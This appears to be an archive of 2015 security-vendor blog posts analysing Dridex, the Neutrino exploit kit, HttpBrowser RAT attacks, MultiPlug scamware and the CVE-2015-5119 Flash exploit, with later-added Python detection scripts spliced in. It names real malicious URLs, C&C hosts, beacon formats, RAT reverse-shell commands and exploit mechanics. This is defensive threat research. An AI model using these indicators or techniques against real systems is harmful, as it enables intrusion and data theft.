Monday, August 24, 2015

Signed Dridex Campaign

Introduction

Malware authors use various means to make their malware look similar to legitimate software. One such approach involves signing a malware sample with a digital certificate. While reviewing samples in our Cloud Sandbox, we recently saw Dridex malware authors using this technique. Dridex is a banking Trojan which typically arrives on a system via malicious spam email with a Microsoft Office file as an attachment. These files have embedded macros that lead to the download and installation of the Dridex Trojan. Dridex then attempts to steal the victim's banking credentials and system information.

Signed Dridex campaign

Here we came across one malicious attachment with an encrypted macro that downloads signed Dridex samples from 81.17.28.101/bt/bt/sti[.]php. This Dridex sample is packed using a custom packer, which is compiled with .NET. The current Dridex is signed with a certificate that is issued to Private Person Parobii Yuri Romanovich. This certificate has been specially created for spreading the Dridex malware.


Certificate
We also saw the following signer information in the certificates used for signing the Dridex executables:
  • PJSC "BIZNES AVTOMATYKA"
  • AVTOZVIT Scientific Production Private Company
  • Private Person Parobii Yuri Romanovich
The certificates were all issued by COMODO and we observed the following URLs serving the signed Dridex malware:
Below are the Dridex samples served from the aforementioned URLs. All of the samples are packed with the same .NET packer mentioned above:
Dridex Packer:
The Dridex sample is embedded in the resource section of the packer. After unpacking, it drops a Borland Delphi executable file. The following is the snapshot of encrypted resource section:

Encrypted Resource Section
Dridex Activity:
The current Dridex sample tries to connect to the different IPs included in its config file. The config file is embedded in the sample itself. In the config file we observed a botnet ID and a list of C&C servers. Below is a snapshot of the config file:

Configuration file
Dridex collects and sends the following system information to one of the C&C servers mentioned in the config file:
  • Computer Name
  • User Name
  • Windows Version
  • Botnet ID
Information sent to the server
Below is the complete list of C&C servers it tries to connect to.

Conclusion

The use of a legitimate certificate in signing malware executables to evade security detection is not new but is still very effective. The malware author aims to exploit the Code-Signing Certificate based whitelisting approach by signing their samples. Zscaler ThreatlabZ is actively monitoring these signed malware campaigns and ensuring coverage for our customers.

Analysis by Tarun Dewan and Nirmal Singh

Thursday, August 20, 2015

Neutrino Campaign Leveraging WordPress, Flash for CryptoWall

Overview

Neutrino Exploit Kit (EK) appeared on the scene around March of 2013 and continues to remain active and incorporate new exploits. In the beginning of July, Neutrino reportedly incorporated the HackingTeam 0day (CVE-2015-5119), and in the past few days we've seen a massive uptick in the use of the kit. The cause for this uptick appears to be widespread WordPress site compromises.

ThreatLabZ started seeing a new campaign where WordPress sites running version 4.2 and lower were compromised, and the image below illustrates the components involved in this campaign.

Fig 1. Complete Neutrino WordPress campaign

In analyzing the infection cycle, there are multiple recent changes in the Neutrino code, some that are normally characteristic of Angler Exploit Kit, but others that remain unique to Neutrino.

WordPress Compromises

Similar to Angler Exploit Kit, the new wave of Neutrino is targeting outdated versions of WordPress. In fact, we have seen over 2600 unique WordPress sites being used in this campaign where more than 4200 distinct pages have been logged with dynamic iframe injection in the last month. As mentioned, all the targeted websites were running WordPress version 4.2 and lower.

Fig 2. Event timeline overview

The goal of this campaign is to completely and fully compromise the site, which includes adding a webshell, harvesting credentials, and finally injecting an iframe that loads a Neutrino landing page. The iframe is injected into the compromised site immediately after the BODY tag, and is almost identical to recent Angler samples. Compare these recent Neutrino and Angler samples below.

Fig 3. Neutrino on the left, Angler on the right

The code specifically targets Internet Explorer, so those using other browsers won't be served the iframe, and a cookie is used to prevent serving the iframe multiple times to the same victim.

The actual Neutrino landing pages are retrieved on the backend through the injected PHP code, a sample of which is below:

Fig 4. Injected PHP code

Note the base64 encoded value boxed in red above; this decodes to the URL below, where X, Y, and Z are integers:
http://93.171.205.64/blog/?bf4z&utm_source=XXXXX:YYYYYY:ZZZ
This URL is used to retrieve an updated landing page URL, and we've noted that the URLs change very frequently. Additionally, the primary IP hosting the majority of landing page domains is '185.44.105.7', which is owned by VPS2DAY.com. We reached out to them via email briefly explaining what we were seeing and received no response.
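A defender-side scanner for the two artifacts described above, added here as an example and not code from the campaign or from ThreatLabZ: it flags an iframe placed directly after the body tag and decodes base64_decode() literals in PHP source to expose a hidden backend URL, then splits the X:Y:Z utm_source value. The HTML, the PHP snippet and the integer triple are constructed; the decoded URL follows the shape quoted above.

```python
import base64
import re
from urllib.parse import urlparse, parse_qs

# An <iframe> that is the very first element after the opening <body> tag: the
# injection position used in this campaign (whitespace between the tags is allowed).
IFRAME_AFTER_BODY = re.compile(r"<body[^>]*>\s*<iframe\b([^>]*)>", re.IGNORECASE | re.DOTALL)
SRC_ATTR = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.IGNORECASE)

# base64_decode("...") calls inside PHP source, the way the injected code hid its backend URL
B64_CALL = re.compile(r"""base64_decode\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")

# utm_source value of the form X:Y:Z where X, Y and Z are integers
UTM_TRIPLE = re.compile(r"^\d+:\d+:\d+$")


def find_iframe_after_body(html: str):
    """Return {'src': ..., 'attrs': ...} for an iframe injected directly after <body>, else None."""
    m = IFRAME_AFTER_BODY.search(html)
    if not m:
        return None
    attrs = m.group(1)
    src = SRC_ATTR.search(attrs)
    return {"src": src.group(1) if src else None, "attrs": attrs.strip()}


def decode_php_urls(php_source: str):
    """Decode every base64_decode('...') literal in PHP source and keep the ones that are URLs."""
    urls = []
    for encoded in B64_CALL.findall(php_source):
        try:
            decoded = base64.b64decode(encoded, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64, or binary content: not a hidden URL
        if decoded.startswith(("http://", "https://")):
            urls.append(decoded)
    return urls


def describe_backend_url(url: str):
    """Split a decoded backend URL into host, path and the X:Y:Z utm_source triple (None if absent)."""
    parts = urlparse(url)
    utm = parse_qs(parts.query).get("utm_source", [None])[0]
    triple = tuple(int(x) for x in utm.split(":")) if utm and UTM_TRIPLE.match(utm) else None
    return {"host": parts.hostname, "path": parts.path, "utm_source": triple}


# --- constructed samples (not captured from the campaign) ---
SAMPLE_HTML = (
    '<html><head><title>blog</title></head>\n'
    '<body class="home">\n'
    '<iframe src="http://landing.invalid/x.html" width="1" height="1"></iframe>\n'
    '<p>content</p></body></html>'
)
# Same shape as the decoded URL in the write-up, with constructed integers for X:Y:Z
_BACKEND = b"http://93.171.205.64/blog/?bf4z&utm_source=12345:678901:234"
SAMPLE_PHP = '<?php $u = base64_decode("%s"); @file_get_contents($u); ?>' % base64.b64encode(_BACKEND).decode()

if __name__ == "__main__":
    print(find_iframe_after_body(SAMPLE_HTML))
    for u in decode_php_urls(SAMPLE_PHP):
        print(describe_backend_url(u))
```

Because the injected code only serves the iframe to Internet Explorer and then sets a cookie, fetch the page with an IE User-Agent and a fresh cookie jar before scanning, or the scanner will see a clean page.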

Neutrino Landing Page

The landing page has been updated and contains some JavaScript that only declares variables, and then a flash loader:

Fig 5. Neutrino landing page

If Flash isn't installed on the victim machine, an old Flash cab is pushed to the user prior to serving the malicious SWF. Note the departure from using base64 encoded data blobs, or really using very much code at all on the landing page.

Neutrino SWF

Past versions of the Neutrino SWF contained multiple exploit payloads encrypted via RC4. Examining this SWF shows that things have apparently changed as the structure is very different:

Fig 6. SWF structure

Taking a look at the code shows that instead of RC4, there is a decode function that uses the input of one binary data blob to decode a second binary blob; the decoded data reveals a second SWF:

Fig 7. Decode function for embedded SWF

Detection results for the SWF are very poor with only one vendor detecting it:

Fig 8. Poor detection results on SWF

Carving out the embedded SWF and analyzing it shows a much more familiar structure for Neutrino, with some additional enhancements. Notably similar is the use of multiple embedded binary blobs that are RC4 encrypted:

Fig 9. Binary data inside embedded SWF

Fig 10. Script data inside embedded SWF - characteristic of Neutrino

These binary blobs contain multiple payloads, and this has been analyzed and documented in the past, notably by Kafeine and Dennis O'Brien on Malwageddon. However, unlike past Neutrino SWFs, the RC4 keys are no longer in cleartext and decoding them requires tracing through multiple function calls. The ActionScript structure is still very recognizable though:

Fig 11. Decoder for one binarydata 'exploitWrapper' blob

Detection on the embedded SWF is also quite poor.

Fig 12. Embedded SWF VT detection

Payload

Successful exploitation of a victim leads to an encrypted executable download. The binary is decrypted and begins beaconing almost immediately:

Fig 13. Initial beacon summary
Fig 14. Full beacon/response sample

Looking at the traffic, we can immediately see this is CryptoWall 3.0. Sure enough, a couple of minutes later we see the all too familiar 'HELP_DECRYPT' page and see connections out to the payment servers:

Fig 15. Payment server connections

Fig 16. CryptoWall 3.0 HELP_DECRYPT page

To read more about CryptoWall, please see our previous writeup here.

Campaign Information

As stated, the primary IP for the observed Neutrino landing pages is '185.44.105.7' which is owned by VPS2DAY.com. Many of the domains pointing to that IP utilize 'xyz', 'ga', 'gq', and 'ml' TLDs. Taking a look at the whois data for some of these domains, a common attribute seems to be the name 'Max Vlapet' for .XYZ domains. Full whois domain sample for completeness:


Unfortunately, very little information is available for the other TLDs in use. The backend IP serving new landing page URLs is registered to a company called 'VDS INSIDE' located in Ukraine.

A dump of the 700+ malicious domains and/or landing pages we've collected is on pastebin: http://pastebin.com/946rPaGx

Conclusion

WordPress, being a widely popular and free Content Management System (CMS), remains one of the most attractive targets for cyber criminals. WordPress compromises are not new, but this campaign shows an interesting underground nexus starting with backdoored WordPress sites, a Neutrino Exploit Kit-controlled server, and the highly effective CryptoWall ransomware. This campaign also reconfirms that Neutrino Exploit Kit activity is on the rise and is still a major player in the exploit kit arena.

ThreatLabZ is actively monitoring this campaign and ensuring that Zscaler customers are protected.

Acknowledgement

Special thanks to Dhruval Gandhi for profiling compromised WordPress sites.

Write-up by: John Mancuso, Deepen Desai



Chinese cyber espionage APT group ‘Emissary Panda’ activity update


Introduction

Last week we shared research on the Chinese cyber espionage APT group ‘Emissary Panda’ and how the group is for the first time leveraging Hacking Team’s leaked exploits to target a multinational financial services firm. Upon further analysis we have identified multiple other industry verticals that were also targeted by this group in the last month. The ‘Emissary Panda’ APT group has been known to target the government and technology sectors with the intent to monitor and steal intellectual property data.

There were multiple global clients targeted in the last month that belong to the following industry verticals:
  • Financial Services
  • Energy
  • Pharmaceutical

Attack Chain

As noted before, this was the first instance of the ‘Emissary Panda’ group weaponizing malware payloads using the 0-day exploits found in the leaked Hacking Team archives. We were able to confirm usage of Adobe Flash exploits CVE-2015-5119 and CVE-2015-5123 in these attacks.

In the attack against a Pharmaceutical firm, we observed the use of a compromised Government site to redirect the victim to a server hosting the Hacking Team’s 0-day Flash exploit. This technique is known as Strategic Web Compromise (SWC) or a Watering Hole attack, wherein a legitimate trusted website known to be visited by the target group is compromised in order to redirect them to the attacker controlled server. The attacker controlled server will serve and execute browser based exploits to install a RAT on the target machine.

APT Attack chain targeting a multinational Pharmaceutical company
In this attack, we were able to prevent the download and installation of the RAT payload.

In another instance, a spear-phishing e-mail was used to target an organization in the energy sector, which resulted in the installation of the HttpBrowser RAT. The attacks against these organizations were largely unsuccessful as the Zscaler security platform blocked either the exploitation attempt or the Command & Control communication attempt.

Emissary Panda APT attacks seen in last month
We are still investigating some of these attack chains and will share additional details when they become available.

Conclusion

It is alarming to see an uptick in the activity from this group targeting multiple verticals with organizations located in the United States, Europe, the Middle East, and Asia. In order to protect themselves, it is extremely important for organizations to have SSL security inspection enabled as well as a Sandbox environment to detonate and block the 0-day exploits involved in such targeted attacks.

Friday, August 14, 2015

Chinese cyber espionage APT group leveraging recently leaked Hacking Team exploits to target a Financial Services Firm

Introduction

As predicted following the leak of Hacking Team exploit codes covered here, the Zscaler security research team has recently started seeing a Chinese cyber espionage group weaponizing malware payloads using the 0-day exploits found in the leaked Hacking Team archives. As such, this new attack represents a dangerous new hybrid combining the work of a notorious cyber criminal gang with a Chinese cyber espionage group to attack a financial services firm.

Zscaler's cloud sandboxes recently detected a Remote Access Trojan (RAT) being delivered by a well-known Chinese cyber espionage group using the Hacking Team’s 0-day exploits. This attack was specifically targeting a well-known financial services firm. The exploit files involved were identical to the Hacking Team's leaked exploit HTML, JavaScript, and ShockWave Flash 0-day files. The end payload that was installed is the HttpBrowser RAT, known to be used by the Chinese group in previous targeted attacks against governments.

Figure 1: Chinese APT attack cycle to plant HttpBrowser RAT

Hacking Team Exploits

The attack involved targeted users visiting a malicious URL delivered via a spear phishing attack. The malicious URL points to a remote server located in Hong Kong (IP Address - 210.209.89.162) that downloads and executes a malicious ShockWave Flash payload through a specially crafted HTML & JavaScript. The exploit files involved are identical to the ones that we found during our analysis of the Hacking Team leaked code as seen below:

Figure 2: Resemblance with Hacking Team's exploit HTML

Figure 3: Resemblance with Hacking Team's SWF exploit
The Adobe ShockWave exploit (CVE-2015-5119), if successful, will download and install a variant of the HttpBrowser RAT from the same Hong Kong based server, which eventually also serves as the Command & Control (C&C) server.

Figure 4: Hong Kong based server used in the attack [credit: domaintools.com]

Malware Payload - HttpBrowser RAT

HttpBrowser is a RAT that has become extremely popular in the past two years among APT adversaries, leveraged in various targeted attacks. The RAT has been leveraged as the primary payload by the APT group that is also known to install the nasty PlugX backdoor RAT during lateral movement in the victim environment after compromise.

The HttpBrowser payload used for the attack was compiled just a few days before the attack, as seen below:

Figure 5: HttpBrowser payload compilation time

The HttpBrowser installer archive structure is very similar to that observed in previous PlugX attacks. The installer archive in our case was svchost.exe (saved as xox.exe) and consisted of the following three files:
  • VPDN_LU.exe - A legitimate digitally signed Symantec Antivirus executable, used to evade detection
  • navlu.dll - A fake Symantec DLL that decrypts and runs the HttpBrowser RAT
  • navlu.dll.url - Encrypted HttpBrowser RAT payload

Figure 6: Legitimate Symantec Antivirus executable used in the attack
The HttpBrowser RAT installer is responsible for dropping the above three files and running the legitimate Symantec Antivirus binary VPDN_LU.exe. The legitimate binary contains the navlu.dll in the import table ensuring that the DLL will be loaded before it runs. The navlu.dll that gets loaded in this case will be the fake Symantec DLL file present in the same directory and it will patch the entry point of the main executable file with a jump instruction to run the DLL’s code instead. 

Figure 7: Legitimate executable entry point patched
This technique is also known as DLL Hijacking, and it ensures that the fake Symantec DLL gets loaded by abusing the Windows DLL load order. The DLL's code is responsible for decrypting and running the HttpBrowser RAT payload from the navlu.dll.url file in the same memory space as the benign executable. The decryption routine consists of an incremental XOR, as seen below:

Figure 8: Incremental XOR routine to decrypt RAT payload
The HttpBrowser installer structure ensures that the malware evades detection by running in the context of the legitimate signed binary. This also ensures that the malicious DLL will not run by itself in automated analysis environments.

The malware then deletes the original installer file and moves the dropped files to the following locations:
  • %ALLUSERPROFILE%\%APPDATA%\vpdn\VPDN_LU.exe
  • %ALLUSERPROFILE%\%APPDATA%\vpdn\navlu.dll
  • %ALLUSERPROFILE%\%APPDATA%\vpdn\navlu.dll.dll
The malware also creates the following registry entry to ensure persistence:
  • HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run vpdn “%ALLUSERPROFILE%\%APPDATA%\vpdn\VPDN_LU.exe”

Command & Control communication

The HttpBrowser RAT variant was configured to connect to the following Command & Control server upon successful infection:
  • update.hancominc[.]com:8080
It relays the following information about the victim machine in an encrypted format over SSL:
/loop?c=<computerName & userName>&l=<IP Address>&o=<Operating System details>&u=<GUID>&r=<Injection Status (Boolean)>&t=<Running Time>
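As an added example (not part of the original write-up), the following Python parses SSL-inspected proxy log lines and flags requests matching the /loop beacon shape above, reporting why each one was flagged; the log format and the log lines are constructed, and the C&C host is the one named in the post, undefanged here so that it matches.

```python
import re
from urllib.parse import urlsplit, parse_qs

# C&C host from the write-up (defanged in the text as update.hancominc[.]com)
KNOWN_C2 = {"update.hancominc.com"}

# The six query parameters HttpBrowser sends on its /loop beacon
BEACON_PARAMS = {"c", "l", "o", "u", "r", "t"}

GUID_RE = re.compile(r"^\{?[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}\}?$")

# Constructed log layout: "<timestamp> <client_ip> <method> <url> <status>"
LOG_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\d{3})$")


def parse_beacon(url: str):
    """Return a dict describing a /loop beacon, or None if the URL does not have the beacon shape."""
    parts = urlsplit(url)
    if parts.path != "/loop":
        return None
    q = parse_qs(parts.query, keep_blank_values=True)
    if not BEACON_PARAMS <= set(q):  # all six parameters must be present
        return None
    reasons = ["/loop beacon with c,l,o,u,r,t parameters"]
    if parts.hostname in KNOWN_C2:
        reasons.append("known C&C host")
    if parts.port == 8080:
        reasons.append("port 8080 as in the observed configuration")
    if GUID_RE.match(q["u"][0]):
        reasons.append("u= carries a GUID")
    if q["r"][0].lower() in ("0", "1", "true", "false"):
        reasons.append("r= is a boolean injection status")
    return {"host": parts.hostname, "port": parts.port, "victim": q["c"][0],
            "victim_ip": q["l"][0], "os": q["o"][0], "reasons": reasons}


def scan_log(lines):
    """Run parse_beacon over every parsable log line and collect the hits with time and client."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, client, _method, url, _status = m.groups()
        beacon = parse_beacon(url)
        if beacon:
            hits.append({"time": ts, "client": client, **beacon})
    return hits


# --- constructed log lines (not real traffic) ---
SAMPLE_LOG = [
    "2015-08-14T10:02:11Z 10.1.2.3 GET https://update.hancominc.com:8080/loop?c=WKSTN-07%20%26%20jdoe"
    "&l=10.1.2.3&o=Windows%207%20SP1&u=%7B3F2504E0-4F89-11D3-9A0C-0305E82C3301%7D&r=1&t=42 200",
    "2015-08-14T10:02:12Z 10.1.2.3 GET https://www.example.com/loop?c=1 200",
    "2015-08-14T10:02:13Z 10.1.2.9 GET https://cdn.example.net/assets/app.js 200",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```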
The commands supported by this RAT variant are:

Command     Description
init        Start reverse shell and send list of drives on infected system
setcmd      Change the default (cmd.exe) shell
settime     Set sleep time
uninstall   Uninstall itself
write       Write command to shell
list        Send list of files and folders to C&C
upload      Download file from C&C
down        Upload file to C&C

Here are some sample decrypted C&C transactions from the HttpBrowser RAT:

Figure 9: List of drives sent as part of the init command

Figure 10: List of files sent as part of the list command

Conclusion

HttpBrowser RAT, due to its range of features including an SSL based C&C channel and anti-detection & anti-analysis techniques, remains a popular malware of choice for APT attacks. There have been multiple instances where this RAT co-existed with PlugX RAT on the compromised network, indicating an APT adversary group with a set attack tool arsenal. The network infrastructure leveraged in this attack against the financial services firm shows the involvement of a previously known cyber espionage APT group of Chinese origin. The main motive of this group is to monitor and exfiltrate intellectual property data from the target organization.

Zscaler’s ThreatLabZ has confirmed coverage for these exploits and for the HttpBrowser variant, ensuring protection for organizations using Zscaler’s Internet security platform.

Research by: Abhay Yadav, Avinash Kumar, Nirmal Singh, Deepen Desai

Wednesday, July 29, 2015

Anatomy of a Scamware Network - MultiPlug


While examining our cloud sandbox data recently, we uncovered a large MultiPlug network that caught our attention due to its pattern of code signing certificate use and the breadth of its hosting infrastructure.


Overview of the Scamware Hosting Network (Node Legend -- Red: Host, Pink: Domain, Green: File-MD5)



As we discussed in June, MultiPlug is a common scamware family that tricks users into downloading/installing an initial binary, which then delivers a variety of additional spyware packages. Search poisoning is used to bait users into installing the scamware, with the lures including cracked and legitimate software, pirated music and movies, as well as other documents and files that a user might be seeking.


This installer pretends to help speed up your downloads

After taking the bait and executing the file, the user is presented with one of several typical-looking installer dialogs that promise to deliver what the user was originally searching for. Whether the user realizes the mistake or not, the “installer” will proceed to fetch multiple encrypted payloads from a remote webserver. The installation of the payloads continues even if the user clicks the various “Decline”, “Cancel”, or “Exit” buttons. Throughout the process, the scamware also gathers system information and sends it to remote webservers.


Data sent to remote servers via HTTP POST

Several typical components of the scamware include a payload called ‘compfix’ that is installed as a system service to be run at boot time, as well as a payload called ‘SystemStrengthener’.


'compfix' installed as a service



Besides the benevolent-sounding payloads mentioned above, the scamware makes a few changes to the user's browser configuration. If Chrome is installed, two DLLs are dropped into the Chrome installation directory that appear to be modified and slightly outdated versions of 'chrome.dll'. Chrome and Internet Explorer also receive browser extensions that spy on user behavior and serve ads. As a bonus, the IE add-ons are marked so that they cannot be uninstalled without Administrator approval.


Modified Chrome DLLs with invalid certs


User is prevented from disabling scamware addons

New Chrome addons installed without notice

Apart from some additional obfuscation layers compared to previous versions, the technical aspects of this malware are fairly standard. However, the breadth of the hosting network and the pattern of code signing certificates used made this an interesting campaign. We uncovered 33 unique certificates, all issued from the same Certificate Authority: Certum / Unizeto Technologies. (Note: we also identified other adware campaigns utilizing Certum certificates, though they appeared to be unrelated.)

Unizeto Technologies / CERTUM issued certificates (Node Legend -- Yellow: Issuer, Blue: Signer)


These 33 certificates were used to sign 2,783 pieces of scamware that were hosted on 447 unique hosts (323 unique domains). While it's normal for adware campaigns that utilize code signing to rotate through their certificates as they are blocked by AV and security companies, the volume of unique signing certificates in use signals that something is different here. Additionally, the data in the signatures indicates that all of the certificates are owned by individual persons with free email accounts. This hinders naive blacklisting as well as attribution, since there is no clear way to link the campaign to a specific organization.


Overview of the Scamware Network (Node Legend -- Yellow: Issuer, Blue: Signer, Red: Host, Pink: Domain, Green: File-MD5)

Given the nature of this MultiPlug campaign, it is easy to hypothesize that the organization behind it has more evil intent than the usual adware/scamware operators. That said, it could just be a matter of the organization trying to maximize their ROI for the large infrastructure they operate. Regardless of their intentions, enterprises should be wary of even the most innocuous looking adware due to its ability to perform system and network reconnaissance, achieve persistence on infected hosts, deliver arbitrary payloads, and take control of the system, its applications, and its data.



Monday, July 13, 2015

Adobe Flash Vulnerability CVE-2015-5119 analysis


With the leak of Hacking Team's data, the security industry came to learn about multiple new 0day vulnerabilities targeting Flash, Internet Explorer, Android, etc. As always, exploit kit authors were quick to incorporate these 0day exploits into their arsenal.

In this blog, we will be looking at the CVE-2015-5119 exploit payload that we have now seen in the wild. The sample has multiple layers of obfuscation and packer routines. The malicious Flash payload is packed, XOR'ed and stored as binary data inside a parent Flash file that dynamically unpacks the malicious Flash file and writes it to memory at run time.

Here is the structure of the CVE-2015-5119 exploit payload:


Packages, properties and method names are stored in variables for obfuscation:


Here we observe the calling of the unpack routine to decrypt the embedded SWF exploit payload:


The XOR key used for unpacking is hardcoded and assigned to the variable vari_10. This is what the unpacked content looks like:
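An added analyst helper, not code from the exploit or from the write-up: it brute-forces a single-byte XOR key over an embedded binary-data blob and reports the SWF it uncovers, so a packed inner Flash file can be carved for scanning without first locating vari_10 in the obfuscated ActionScript. The single-byte key width and the sample blob are assumptions for illustration; the post does not state the key's length.

```python
import struct
import zlib

SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")  # uncompressed, zlib-compressed, LZMA-compressed


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (the key width assumed for this example)."""
    return bytes(b ^ key for b in data)


def looks_like_swf(data: bytes) -> bool:
    """Header sanity check: known magic, plausible version byte, declared length covering the header."""
    if len(data) < 8 or data[:3] not in SWF_MAGICS:
        return False
    version = data[3]
    declared_len = struct.unpack_from("<I", data, 4)[0]
    return 1 <= version <= 40 and declared_len >= 8


def carve_embedded_swf(blob: bytes):
    """Try all 256 single-byte keys on the header; return (key, decoded_bytes) for the first SWF hit, else None."""
    for key in range(256):
        if looks_like_swf(xor_bytes(blob[:8], key)):
            return key, xor_bytes(blob, key)
    return None


def swf_summary(swf: bytes) -> dict:
    """Report signature, version and declared length; for CWS also check that the body inflates to that length."""
    signature = swf[:3].decode("ascii")
    declared_len = struct.unpack_from("<I", swf, 4)[0]
    info = {"signature": signature, "version": swf[3], "declared_length": declared_len, "inflates": None}
    if signature == "CWS":
        try:
            info["inflates"] = len(zlib.decompress(swf[8:])) + 8 == declared_len
        except zlib.error:
            info["inflates"] = False
    return info


# --- constructed sample: a zlib-compressed SWF header over a synthetic body, XORed with key 0x5A ---
BODY = bytes(range(64))  # stand-in for a real tag stream; only the header is inspected here
INNER_SWF = b"CWS" + bytes([13]) + struct.pack("<I", 8 + len(BODY)) + zlib.compress(BODY)
PACKED_SAMPLE = xor_bytes(INNER_SWF, 0x5A)

if __name__ == "__main__":
    hit = carve_embedded_swf(PACKED_SAMPLE)
    if hit:
        key, swf = hit
        print("key=0x%02x" % key, swf_summary(swf))
```

The recovered bytes can be handed to a SWF decompiler or submitted for scanning on their own, which is what the detection figures in the next post compare against.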



Upon decompilation, it is apparent that the majority of the codebase, including variable names and function names, is the same as what we saw in the leaked source from Hacking Team. The public exploit also has checks for:
  • Presence of a debugger
  • Operating System bitness (32-bit or 64-bit)


When program execution starts, the ActionScript looks for the input parameters and, based on them, sets a variable which is then passed to the main exploitation routine, as seen below:


The TryExpl() routine allocates sequential pages of memory and begins the exploit cycle:



The vulnerability lies in making use of the valueOf property and corrupting the vector space so that the valueOf property overwrites the length field of the vector object, which is then used to get access to vtables.

Here is the explicit definition of the valueOf function:


prototype.valueOf() is setting up the length of the ByteArray to 4352

Once the memory allocation is done, a MyClass object is created and assigned to _ba[3]. The valueOf() function sets the length of the ByteArray to 4352, which is greater than the length of the object created, causing reallocation of bytes inside memory.



If the value of _ba[3] is set to zero after the assignment then it was successful in triggering a Use After Free vulnerability. The exploit code looks for the kernel32.VirtualProtect() (VP) function in the corrupted vector space as seen below:


A call to the VP function is made, which replaces the vtable pointer and sets the PAGE_EXECUTE_READWRITE permission before executing the final payload.



Hashes of CVE-2015-5119 exploit payloads seen in the wild:


Conclusion

It will be a challenge for security vendors to get container file detection in place, as the majority of the time the embedded content is highly obfuscated with multiple levels of packing. Adobe has already released a patch to fix this issue. We highly recommend enabling Adobe's auto-update feature to keep the relevant plugins updated.

References: